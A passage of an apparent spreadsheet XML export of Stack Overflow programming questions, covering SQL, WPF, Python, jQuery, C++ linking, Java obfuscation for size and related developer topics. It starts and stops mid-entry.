&lt;li&gt;Uses newer technologies like MVC, LINQ.. (not important)&lt;/li&gt;
&lt;li&gt;(Anything else that matters which I couldn't think of right now)&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>Word frequency algorithm for natural language processing</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Without getting a degree in information retrieval, I'd like to know if there exists any algorithms for counting the frequency that words occur in a given body of text.  The goal is to get a "general feel" of what people are saying over a set of textual comments.  Along the lines of &lt;a href="http://wordle.net/"&gt;Wordle&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;What I'd like:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;ignore articles, pronouns, etc ('a', 'an', 'the', 'him', 'them' etc)&lt;/li&gt;
&lt;li&gt;preserve proper nouns&lt;/li&gt;
&lt;li&gt;ignore hyphenation, except for soft kind&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Reaching for the stars, these would be peachy:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;handling stemming &amp;amp; plurals (e.g. like, likes, liked, liking match the same result)&lt;/li&gt;
&lt;li&gt;grouping of adjectives (adverbs, etc) with their subjects ("great service" as opposed to "great", "service")&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I've attempted some basic stuff using Wordnet but I'm just tweaking things blindly and hoping it works for my specific data.  Something more generic would be great.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Benefits of SQL Server 2005 over 2000</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Could somebody please name a few.  I could given time, but this is for somebody else, and I'd also like some community input.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I report to users what is consuming the process address space of a windows application while they're running it?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing the memory manager for an application, as part of a team of twenty-odd coders.  We're running out of memory quota and we need to be able to see what's going on, since we only appear to be using about 700Mb.  I need to be able to report where it's all going - fragmentation etc.  Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to match a single quote in sed</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How to match a single quote in sed if the expression is enclosed in single quotes:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;sed -e '...'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;For example need to match this text:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;'foo'
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Optional Parameters in Mysql stored procedures</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I create an optional parameter in a mysql stored procedure?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I best convert a DbType to System.Type?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I best convert a System.Data.DbType enumeration value to the corresponding (or at least one of the possible corresponding) System.Type values?&lt;/p&gt;
&lt;p&gt;For example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;DbType.StringFixedLength -&amp;gt; System.String 
DbType.String -&amp;gt; System.String
DbType.Int32 -&amp;gt; System.Int32
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've only seen very "dirty" solutions but nothing really clean.&lt;/p&gt;
&lt;p&gt;(yes, it's a follow up to a different question of mine, but it made more sense as two seperate questions)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Make Web Application Accessible</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What things have to be done before I can honestly tell myself my web application is accessible by anyone? Or even better, convince Joe Clark. I don't have any video or audio to worry about, so I know I won't need transcripts. What else do I have to check?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Statistically removing erroneous values</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a application where users enter prices all day. These prices are recorded in a table with a timestamp and then used for producing charts of how the price has moved... Every now and then the user enters a price wrongly (eg. puts in a zero to many or to few) which somewhat ruins the chart (you get big spikes). We've even put in an extra confirmation dialogue if the price moves by more than 20% but this doesn't stop them entering wrong values...&lt;/p&gt;
&lt;p&gt;What statistical method can I use to analyse the values before I chart them to exclude any values that are way different from the rest?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt; To add some meat to the bone. Say the prices are share prices (they are not but they behave in the same way). You could see prices moving significantly up or down during the day. On an average day we record about 150 prices and sometimes one or two are way wrong. Other times they are all good...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best solution for using EJBs from Excel</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We would like to give access to some of our EJBs from Excel. The goal is to give an API usable from VBA.&lt;/p&gt;
&lt;p&gt;Our EJBs are mostly Stateless Session Beans that do simple CRUD operations with POJOs.&lt;/p&gt;
&lt;p&gt;Some possible solutions: &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Exposing the EJBs as WebServices and create a VB/C# dll wrapping them,&lt;/li&gt;
&lt;li&gt;Using Corba to access the EJBs from C#,&lt;/li&gt;
&lt;li&gt;Creating a COM Library that uses Java to access the EJBs,&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Pointers to frameworks for these solution or other ideas are welcome.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Multiple forms on ASP.NET page</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Coming from a Classic ASP background, I'm used to multiple forms on a page, but this clearly limited in a ASP.NET page.&lt;/p&gt;
&lt;p&gt;However, I have a situation where I have a form that gathers input from the user, saves the data to a DB, and afterwards I want to render (and tweak the values of) a special form that posts to the PayPal website.&lt;/p&gt;
&lt;p&gt;If the PayPal form's field values were static, there would be no problem, but since I want to manipulate the form server-side (to tweak the qty, desc, price fields etc) this &lt;em&gt;will&lt;/em&gt; be a problem.&lt;/p&gt;
&lt;p&gt;I was considering redirecting to a different page after writing to the DB, and I suspect this would work fairly well, but it's a bit of extra effort that may be unneccessary.&lt;/p&gt;
&lt;p&gt;It has also been suggested to me that I could programmatically render a different form, depending on where in the cycle I am. That is, use a placeholder, and on Page_Load I would add a DB Form (complete with child controls) initially, and the PayPal form after a Postback.&lt;/p&gt;
&lt;p&gt;This scenario has got to be a common one for you guys, so I'm looking for opinions advice and any relevant code samples if you have preferred approach.&lt;/p&gt;
&lt;p&gt;I know I can get by, but this project is a learning vehicle so I want to adopt what passes for best practice.&lt;/p&gt;
&lt;p&gt;Thanks in advance...&lt;/p&gt;
&lt;p&gt;Chris&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to calculate the sum of values in a tree using SQL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to sum points on each level earned by a tree of users. Level 1 is the sum of users' points of the users 1 level below the user. Level 2 is the Level 1 points of the users 2 levels below the user, etc...&lt;/p&gt;
&lt;p&gt;The calculation happens once a month on a non production server, no worries about performance.&lt;/p&gt;
&lt;p&gt;What would the SQL look like to do it?&lt;/p&gt;
&lt;p&gt;If you're confused, don't worry, I am as well!&lt;/p&gt;
&lt;p&gt;User table:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ID    ParentID    Points
1     0           230
2     1           150
3     0           80
4     1           110
5     4           54
6     4           342
Tree:
0
|---\
1    3
| \
2  4---
    \  \
     5  6
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Output should be:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ID    Points    Level1     Level2
1     230       150+110    150+110+54+342
2     150
3     80
4     110       54+342
5     54
6     342
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;SQL Server Syntax and functions preferably...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Export variable from C++ static library</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a static library written in C++ and I have a structure describing data format, i.e.&lt;br&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;struct Format{
    long fmtId;
    long dataChunkSize;
    long headerSize;
    Format(long, long, long);
    bool operator==(Format const &amp;amp; other) const;
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Some of data formats are widely used, like &lt;code&gt;{fmtId=0, dataChunkSize=128, headerSize=0}&lt;/code&gt; and &lt;code&gt;{fmtId=0, dataChunkSize=256, headerSize=0}&lt;/code&gt;&lt;br&gt;&lt;br&gt;
Some data structure classes receive format in constructor. I'd like to have some sort of shortcuts for those widely used formats, like a couple of global &lt;code&gt;Format&lt;/code&gt; members &lt;code&gt;gFmt128, gFmt256&lt;/code&gt; that I can pass by reference. I instantiate them in a .cpp file like &lt;/p&gt;
&lt;p&gt;&lt;code&gt;Format gFmt128(0, 128, 0);&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;and in .h there is&lt;/p&gt;
&lt;p&gt;&lt;code&gt;extern Format gFmt128;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;also, I declare &lt;code&gt;Format const &amp;amp; Format::Fmt128(){return gFmt128;}&lt;/code&gt; and try to use it in the main module.&lt;/p&gt;
&lt;p&gt;But if I try and do it in the main module that uses the lib, the linker complains about unresolved external &lt;code&gt;gFmt128&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;How can I make my library 'export' those global vars, so I can use them from other modules?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>source for eclipse plugin.xml page</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to know where can I find the code which eclipse uses to display the forms in the plugin.xml file. In particular I am looking for the form layout used in the extension tab in the plugin.xml&lt;/p&gt;
</t>
  </si>
  <si>
    <t>When people talk about scaling a website with 'shards', what do they mean?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have heard the 'shard' technique mentioned several times with regard to solving scaling problems for large websites. What is this 'shard' technique and why is it so good?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Order SharePoint search results by more columns</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using a FullTextSqlQuery in SharePoint 2007 (MOSS) and need to order the results by two columns:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT WorkId FROM SCOPE() ORDER BY Author ASC, Rank DESC
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However it seems that only the first column from ORDER BY is taken into account when returning results. In this case the results are ordered correctly by Author, but not by Rank. If I change the order the results will be ordered by Rank, but not by Author.&lt;/p&gt;
&lt;p&gt;I had to resort to my own sorting of the results, which I don't like very much. Has anybody a solution to this?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit&lt;/strong&gt;: Unfortunately it also doesn't accept expressions in the ORDER BY clause (SharePoint throws an exception). My guess is that even if the query looks like legitimate SQL it is parsed somehow before being served to the SQL server.&lt;/p&gt;
&lt;p&gt;I tried to catch the query with SQL Profiler, but to no avail.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit 2&lt;/strong&gt;: In the end I used ordering by a single column (Author in my case, since it's the most important) and did the second ordering in code on the TOP N of the results. Works good enough for the project, but leaves a bad feeling of kludgy code.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a pretty printer for python data?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Working with python interactively, it's sometimes necessary to display a result which is some arbitrarily complex data structure (like lists with embedded lists, etc.)
The default way to display them is just one massive linear dump which just wraps over and over and you have to parse carefully to read it.&lt;/p&gt;
&lt;p&gt;Is there something that will take any python object and display it in a more rational manner. e.g.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[0, 1,
    [a, b, c],
    2, 3, 4]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;instead of:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[0, 1, [a, b, c], 2, 3, 4]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I know that's not a very good example, but I think you get the idea.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Multi tenant architecture and NHibernate</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Could anyone explain me finally what is the best strategy to implement transparent and fluent support of multi-tenant functionality in NHibernate powered domain model?&lt;/p&gt;
&lt;p&gt;Im looking for the way, how to keep the domain logic as isolated as possible from the  multi-tenant stuff like filtering by TenantID etc&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Reading quicken data files</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Looking for an open source library, for C++, Java, C# or Python, for reading the data from Quicken &lt;strong&gt;.qdf&lt;/strong&gt; files.&lt;/p&gt;
&lt;p&gt;@&lt;a href="#91941"&gt;Swati&lt;/a&gt;:  Quicken &lt;strong&gt;.qif&lt;/strong&gt; format is for transfer only and is not kept up to date by the application  like the .qdf file is.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to set code behind a resource dictionary in WPF for event handling?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to set code behind a resource dictionary in WPF. For example in a usercontrol for a button you declare it in XAML. The event handling code for the button click is done in the code file behind the control. If I was to create a data template with a button how can I write the event handler code for it's button click within the resource dictionary.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Python, beyond the basics</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've gotten to grips with the basics of Python and I've got a small holiday which I want to use some of to learn a little more Python. The problem is that I have no idea what to learn or where to start. I'm primarily web development but in this case I don't know how much difference it will make.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to make visualstudio .net work with VB6 and service pack 6</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have VB application that requires visual service pack 6 to run , now when I install visualstudio.net (any version of .net)  Its debugger doesn't work properly ,I am able to create windows/web application in visualstudio.net but not able to debug anything  , so I have to keep 2 computers , one for VB and one for .net , does anybody have any idea what is the cause for this and is there any fix for this ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Running JIRA on a VM</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Anyone have any success or failure running Jira on a VM?&lt;/p&gt;
&lt;p&gt;I am setting up a new source control and defect tracking server.  My server room is near full and my services group suggested a VM.  I saw that a bunch of people are running SVN on VM (including NCSA).  The VM would also free me from hardware problems and give me high availability.  Finally, it frees me from some red tape and it can be implemented faster.&lt;/p&gt;
&lt;p&gt;So, does anyone know of any reason why I shouldn't put Jira on a VM?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Save and Restore Form Position and Size</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In a WinForms 2.0 C# application, what is the typical method used for saving and restoring form position and size in an application?&lt;/p&gt;
&lt;p&gt;Related, is it possible to add new User scoped application settings AT RUNTIME? I totally see how to add settings at design time, that's not a problem. But what if I want to create one at runtime?&lt;/p&gt;
&lt;p&gt;More details:&lt;/p&gt;
&lt;p&gt;My application is a conversion of an existing Visual FoxPro application. I've been trying to read as much as I can about application settings, user settings, etc. and get myself clear on the .Net way of doing things, but there are still several things I am confused on.&lt;/p&gt;
&lt;p&gt;In the Fox app, saved settings are stored in the registry. My forms are subclassed, and I have base class code that automatically saves the form position and size in the registry keyed on the form name. Whenever I create a new form, I don't have to do anything special to get this behavior; it's built in to the base class. My .Net forms are also subclassed, that part is working well.&lt;/p&gt;
&lt;p&gt;In .Net, I get the impression I'm supposed to use User scoped settings for things like user preferences. Size and location of a form definitely seem like a user preference. But, I can't see any way to automatically add these settings to the project. In other words, every time I add a new form to my project (and their are 100's of forms), I have to remember to ADD a User scoped application setting and be sure to give it the same name as the form, i.e.,  "FormMySpecialSizePosition" to hold the size and position. I'd rather not have to remember to do that. Is this just tough luck? Or am I totally barking up the wrong tree by trying to use User scoped settings? Do I need to create my own XML file to hold settings, so that I can do whatever I want (i.e, add a new setting at runtime)? Or something else?&lt;/p&gt;
&lt;p&gt;Surely this is a very common and somebody can tell the "right" way to do it. Thanks in advance!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Python sockets suddenly timing out?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I came back today to an old script I had for logging into Gmail via SSL. The script worked fine last time I ran it (several months ago) but now it dies immediately with:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;urlopen error The read operation timed out&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If I set the timeout (no matter how long), it dies even more immediately with:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;urlopen error The connect operation timed out&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The latter is reproducible with:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import socket
socket.setdefaulttimeout(30000)
sock = socket.socket()
sock.connect(('www.google.com', 443))
ssl = socket.ssl(sock)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;returning:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;socket.sslerror: The connect operation timed out
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but I can't seem to reproduce the former and, after much stepping thru the code, I have no clue what's causing any of this.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>jQuery/JavaScript to replace broken images</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a web page that includes a bunch of images. Sometimes the image isn't available, so a broken image is displayed in the client's browser.&lt;/p&gt;
&lt;p&gt;How do I use jQuery to get the set of images, filter it to broken images then replace the src?&lt;/p&gt;
&lt;hr/&gt;
&lt;p&gt;--I thought it would be easier to do this with jQuery, but it turned out much easier to just use a pure JavaScript solution, that is, the one provided by Prestaul.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Casting array of objects (which implement interface IFoo) to IFoo[] in C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt;class A : IFoo
{
}
...
A[] arrayOfA = new A[10];
if(arrayOfA is IFoo[]) 
{
    // this is not called
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Q1: Why is &lt;code&gt;arrayOfA&lt;/code&gt; not an array of &lt;code&gt;IFoos&lt;/code&gt;?&lt;/p&gt;
&lt;p&gt;Q2: Why can't I cast &lt;code&gt;arrayOfA&lt;/code&gt; to &lt;code&gt;IFoo[]&lt;/code&gt;?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Eventhandling in ascx usercontrols</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is best practises for communicating events from a usercontrol to parent control/page i want to do something similar to this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;MyPage.aspx:
&amp;lt;asp:Content ID="Content1" ContentPlaceHolderID="MainContentPlaceholder" runat="server"&amp;gt;
  &amp;lt;uc1:MyUserControl ID="MyUserControl1" runat="server" 
     OnSomeEvent="MyUserControl_OnSomeEvent" /&amp;gt;
MyUserControl.ascx.cs:
public partial class MyUserControl: UserControl
{
    public event EventHandler SomeEvent;
....
   private void OnSomething()
    {
        if (SomeEvent!= null)
            SomeEvent(this, EventArgs.Empty);
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Question is what is best practise?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Built in unit-testing in VS</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for advice on the built-in unit testing feature provided in VS08. Can any body please tell me if they know of any reasons NOT to use this feature over any of the other packages available (I'm vaguely familiar with NUnit)?&lt;/p&gt;
&lt;p&gt;I'm planning on applying unit testing to an older project just to learn the ropes of unit testing and some of the newer features in the .NET 3.5 framework. I like the look of the built in feature as from the quick demo I ran it seemed incredibly easy to use and I generally find Microsoft documentation very helpful.&lt;/p&gt;
&lt;p&gt;I'd be very grateful if anyone who is familiar with this feature could alert me to any issues I should be aware of or any reasons to avoid this in favour of another package.&lt;/p&gt;
&lt;p&gt;Note: I've tried raking through this (excellent) site for details specific to VS's built in unit testing feature. It has been &lt;a href="http://stackoverflow.com/questions/709/net-testing-framework-advice"&gt;mentioned&lt;/a&gt; a few times but I couldn't an exact match but please accept my apologies if this has been answered elsewhere.&lt;/p&gt;
&lt;p&gt;Thank you, Eric&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Handling the data in an IN clause, with SQL parameters?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We all know that prepared statements are one of the best way of fending of SQL injection attacks.  What is the best way of creating a prepared statement with an "IN" clause.  Is there an easy way to do this with an unspecified number of values?  Take the following query for example.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT ID,Column1,Column2 FROM MyTable WHERE ID IN (1,2,3)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Currently I'm using a loop over my possible values to build up a string such as. &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT ID,Column1,Column2 FROM MyTable WHERE ID IN (@IDVAL_1,@IDVAL_2,@IDVAL_3)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is it possible to use just pass an array as the value of the query paramter and use a query as follows?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT ID,Column1,Column2 FROM MyTable WHERE ID IN (@IDArray)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In case it's important I'm working with SQL Server 2000, in VB.Net&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Server post-join rowcount underestimate</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The Query Optimizer is estimating that the results of a join will have only one row, when the actual number of rows is 2000. This is causing later joins on the dataset to have an estimated result of one row, when some of them go as high as 30,000.&lt;/p&gt;
&lt;p&gt;With a count of 1, the QO is choosing a loop join/index seek strategy for many of the joins which is much too slow. I worked around the issue by constraining the possible join strategies with a &lt;code&gt;WITH OPTION (HASH JOIN, MERGE JOIN)&lt;/code&gt;, which improved overall execution time from 60+ minutes to 12 seconds. However, I think the QO is still generating a less than optimal plan because of the bad rowcounts. I don't want to specify the join order and details manually-- there are too many queries affected by this for it to be worthwhile.&lt;/p&gt;
&lt;p&gt;This is in Microsoft SQL Server 2000, a medium query with several table selects joined to the main select.&lt;/p&gt;
&lt;p&gt;I think the QO may be overestimating the cardinality of the many side on the join, expecting the joining columns between the tables to have less rows in common.&lt;/p&gt;
&lt;p&gt;The estimated row counts from scanning the indexes before the join are accurate, it's only the estimated row count after certain joins that's much too low.&lt;/p&gt;
&lt;p&gt;The statistics for all the tables in the DB are up to date and refreshed automatically.&lt;/p&gt;
&lt;p&gt;One of the early bad joins is between a generic 'Person' table for information common to all people and a specialized person table that about 5% of all those people belong to. The clustered PK in both tables (and the join column) is an INT. The database is highly normalized.&lt;/p&gt;
&lt;p&gt;I believe that the root problem is the bad row count estimate after certain joins, so my main questions are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;How can I fix the QO's post join rowcount estimate?&lt;/li&gt;
&lt;li&gt;Is there a way that I can hint that a join will have a lot of rows without specifying the entire join order manually?&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>A free tool to check C/C++ source code against a set of coding standards?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It looks quite easy to find such a tool for Java (&lt;a href="http://checkstyle.sourceforge.net/"&gt;Checkstyle&lt;/a&gt;, &lt;a href="http://jcsc.sourceforge.net/"&gt;JCSC&lt;/a&gt;), but I can't seem to find one for C/C++. I am not looking for a lint-like static code analyzer, I only would like to check against coding standards like variable naming, capitalization, spacing, identation, bracket placement, and so on.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best Java Obfuscation Application For Size Reduction</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;An important part of mobile development, especially when you are talking about mobile games, is dealing with the application size restrictions. Some devices enforce their own size limits, while all the carriers have their own size requirements for applications to be released in their deck space.&lt;/p&gt;
&lt;p&gt;My question is, is there a java obfuscation application that gets better size reduction results than the other java obfuscation apps that are out there? &lt;/p&gt;
&lt;p&gt;I use Proguard because it is the default Netbeans obfuscator and you can get fairly good size reduction results out of it (by the way, the version of Proguard that comes with Netbeans 6.1 is 3.7. There are newer versions that get even better results, I recommend getting the latest). But, I'm interested in what else is out there and whether they do a better job than Proguard.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;My Conclusion:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I appreciate the responses. Carlos, your response was enough to convince me that Proguard is the current way to go. I could still be convinced otherwise, but don't feel bad with my current setup.&lt;/p&gt;
&lt;p&gt;I have also had some issues with proguard obfuscating and running on some phones, but not too many. I was always able to fix the problem by not using the Proguard argument "-overloadaggressively". Just something to keep in mind if you are experiencing odd behavior related to obfuscating.&lt;/p&gt;
&lt;p&gt;Thanks again.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Practical Alternative for Windows Scheduled Tasks (small shop)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Greetings,&lt;/p&gt;
&lt;p&gt;I work in a very small shop (2 people), and since I started a few months back we have been relying on Windows Scheduled tasks.  Finally, I've decided I've had enough grief with some of its inabilities such as&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;No logs that I can find except on a domain level (inaccessible to machine admins who aren't domain admins)&lt;/li&gt;
&lt;li&gt;No alerting mechanism (e-mail, for one) when the job fails.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Once again, we are a small shop.  I'm looking to do the analogous scheduling system upgrade than I'm doing with source control (VSS --&gt; Subversion).  I'm looking for suggestions of systems that &lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Are able to do the two things outlined above&lt;/li&gt;
&lt;li&gt;Have been community-tested.  I'd love to be a guinae pig for exciting software, but job scheduling is not my day job.&lt;/li&gt;
&lt;li&gt;Ability to remotely manage jobs a plus&lt;/li&gt;
&lt;li&gt;Free a plus.  Cheap is okay, but I have very little interest in going through a full blown sales pitch with 7 power point presentations.&lt;/li&gt;
&lt;li&gt;Built-in ability to run common tasks besides .EXE's a (minor) plus (run an assembly by name, run an Excel macro by name a plus, run a database stored procedure, etc.).  &lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Thanks in advance,
Alan.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>symbian application as background process</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;is it possible to create java application that will
work as background process on symbian smartphones?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is FileStream lazy-loaded in .NET?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a question about using streams in .NET to load files from disk.  I am trying to pinpoint a performance problem and want to be sure it's where I think it is.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Dim provider1 As New MD5CryptoServiceProvider
Dim stream1 As FileStream
stream1 = New FileStream(FileName, FileMode.Open, FileAccess.Read, FileShare.Read)
provider1.ComputeHash(stream1)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Q:  Are the bytes read from disk when I create the FileStream object, or when the object consuming the stream, in this case an MD5 Hash algorithm, actually reads it?&lt;/p&gt;
&lt;p&gt;I see significant performance problems on my web host when using the &lt;code&gt;ComputeHash&lt;/code&gt; method, compared to my local test environment.  I'm just trying to make sure that the performance problem is in the hashing and not in the disk access.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Apply stroke to a textblock in WPF</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do you apply stroke (outline around text) to a textblock in xaml in WPF?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the easiest non-memory intensive way to output XML from Python?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Basically, something similar to System.Xml.XmlWriter - A streaming XML Writer that doesn't incur much of a memory overhead. So that rules out xml.dom and xml.dom.minidom. Suggestions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>UML aggregation when interfaces are used</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;How do I represent an aggregation relation between two classes in UML, such that each class has a link to the other class's interface, not the implementing class?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;E.g. I have a class Foo that implements iFoo, and Bar that implements iBar. Foo should have a member variable of type iBar, and Bar should have a member variable of type iFoo.&lt;/p&gt;
&lt;p&gt;If I create an aggregation between the two implementing classes, then the member will be of the type of the implementing class, not the superclass. And aggregations between interfaces are invalid in UML (and don't make much sense).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>EEFileLoadException when using C# classes in C++(win32 app)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For deployment reasons, I am trying to use IJW to wrap a C# assembly in C++ instead of using a COM Callable Wrapper.  &lt;/p&gt;
&lt;p&gt;I've done it on other projects, but on this one, I am getting an EEFileLoadException.  Any help would be appreciated!&lt;/p&gt;
&lt;p&gt;Managed C++ wrapper code (this is in a DLL):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;extern "C" __declspec(dllexport) IMyObject* CreateMyObject(void)
{
    //this class references c# in the constructor
    return new CMyWrapper( );
}
extern "C" __declspec(dllexport)  void DeleteMyObject(IMyObject* pConfigFile)
{
    delete pConfigFile;
}
extern "C" __declspec(dllexport) void TestFunction(void)
{
    ::MessageBox(NULL, _T("My Message Box"), _T("Test"), MB_OK);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Test Code (this is an EXE):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;typedef void* (*CreateObjectPtr)();
typedef void (*TestFunctionPtr)();
int _tmain testwrapper(int argc, TCHAR* argv[], TCHAR* envp[])
{
    HMODULE hModule = ::LoadLibrary(_T("MyWrapper"));
    _ASSERT(hModule != NULL);
    PVOID pFunc1 = ::GetProcAddress(hModule, "TestFunction");
    _ASSERT(pFunc1 != NULL);
    TestFunctionPtr pTest = (TestFunctionPtr)pFunc1;
    PVOID pFunc2 = ::GetProcAddress(hModule, "CreateMyObject");
    _ASSERT(pFunc2 != NULL);
